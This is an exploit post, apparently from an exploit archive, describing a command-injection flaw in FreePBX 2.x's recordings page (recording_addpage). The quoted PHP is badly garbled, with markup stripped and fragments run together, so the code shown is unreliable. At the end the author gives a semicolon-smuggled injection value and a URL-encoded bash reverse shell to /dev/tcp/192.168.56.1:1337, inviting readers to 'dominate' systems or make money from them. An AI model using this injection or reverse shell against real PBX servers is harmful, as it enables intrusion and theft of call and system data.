App : Freepbx 2.x Download : schmoozecom.net Auther : i-Hmx Mail : n0p1337@gmail.com Home : security arrays inc. , sec4ever.com , exploit4arab.net And again , while the distro is widely user , Schmoozecom staff not giving it enough attention , all they provided for the distro is adding the schmoozecom fancy logo and "Developed by schmoozecom" Teraraa :/ What ever, Freepbx suffer from another command execution vuln , not so critical but perhaps many people gonna be interested abt it as it can be used to dump plaintext data from the PBX Box ;) Vulnerable function "recording_addpage" @ admin/modules/recordings/page.recordings.php function recording_addpage($usersnum) { global $fc_save; global $fc_check; global $recordings_save_path; ?>

'; echo _("Using your phone,").""._(" dial")." ".$fc_save." "; echo _("Start speaking at the tone. Press # when finished.").""; echo _("and speak the message you wish to record. Press # when finished.")."\n"; echo '

'; } else { ?>
" tabindex="">

must be PCM Encoded, 16 Bits, at 8000Hz")?>:
" onclick="document.upload.submit(upload);alert('');" tabindex=""/>
"._("Successfully uploaded")." ".$_FILES['ivrfile']['name'].""; $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.'); } ?>

"._("dial")." ".$fc_check." "._("to listen to your recording.")?>

"._("Step 2: Name").""; } ?>
:
\n"; ?> " tabindex="">
faris;fax or , for backconnetion use fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris and you are ready to dominate , or even make some $$ if you r interested ;) Have a good day